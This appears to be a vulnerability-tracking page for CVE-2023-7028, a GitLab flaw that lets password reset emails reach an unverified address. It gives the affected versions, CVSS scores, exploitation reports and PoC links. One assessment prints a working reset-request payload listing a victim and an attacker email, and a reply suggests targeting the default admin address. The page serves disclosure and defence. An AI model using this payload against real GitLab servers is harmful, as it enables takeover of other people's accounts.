Attacker Value

Very High

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2023-7028

Disclosure Date: January 12, 2024 •

CVE-2023-7028 CVSS v3 Base Score: 9.8

Exploited in the Wild

Reported by inokii and 1 more...
View Source Details

Description

An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.

Add Assessment

noraj (102)

January 12, 2024 10:51am UTC (10 months ago)•

Ratings

Attacker Value

Very High

Exploitability

Very High

Common in enterprise Easy to weaponize Gives privileged access Unauthenticated Vulnerable in default configuration

Technical Analysis

Tested on Gitlab CE 16.6.1. Very effective and easy to exploit. In the following payload the brackets MUST be URL encoded, else it won’t work: user[email][]=victim@example.org&user[email][]=attacker@example.org.

POST /users/password HTTP/2
Host: gitlab.example.org
...

authenticity_token=<auto_generated_token>&user%5Bemail%5D%5B%5D=victim%40example.org&user%5Bemail%5D%5B%5D=attacker%40example.org

Note that you must know the email address and not the login name.

See here for vulnerable and patched versions.

See More &1 replySee Less

imjdl (3) January 12, 2024 11:14am UTC (10 months ago)

Or use the default administrator email admin@example.com

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

9.8 Critical

Impact Score:

5.9

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

Vendors

gitlab

Products

gitlab

Metasploit Modules

auxiliary/admin/http/gitlab_password_reset_account_takeover (https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb)

Exploited in the Wild

Reported by:

inokii indicated sources as

Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog)

Reported: May 03, 2024 3:34pm UTC (6 months ago)

AttackerKB Worker indicated source as Government or Industry Alert (https://www.cisa.gov/news-events/alerts/2024/05/01/cisa-adds-one-known-exploited-vulnerability-catalog)

Reported: November 08, 2024 8:22am UTC (6 days ago)

References

Canonical

CVE-2023-7028 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7028)

Exploit

PoCs that have not been added by contributors directly have been sourced from: nomi-sec/PoC-in-GitHub.
A PoC added here by the AKB Worker must have at least 2 GitHub stars.

PoC (https://github.com/Vozec/CVE-2023-7028 )

PoC (https://github.com/RandomRobbieBF/CVE-2023-7028 )

CVE-2023-7028 (https://github.com/Vozec/CVE-2023-7028) (Added by AKB Worker)

CVE-2023-7028 (https://github.com/V1lu0/CVE-2023-7028) (Added by AKB Worker)

CVE-2023-7028 (https://github.com/RandomRobbieBF/CVE-2023-7028) (Added by AKB Worker)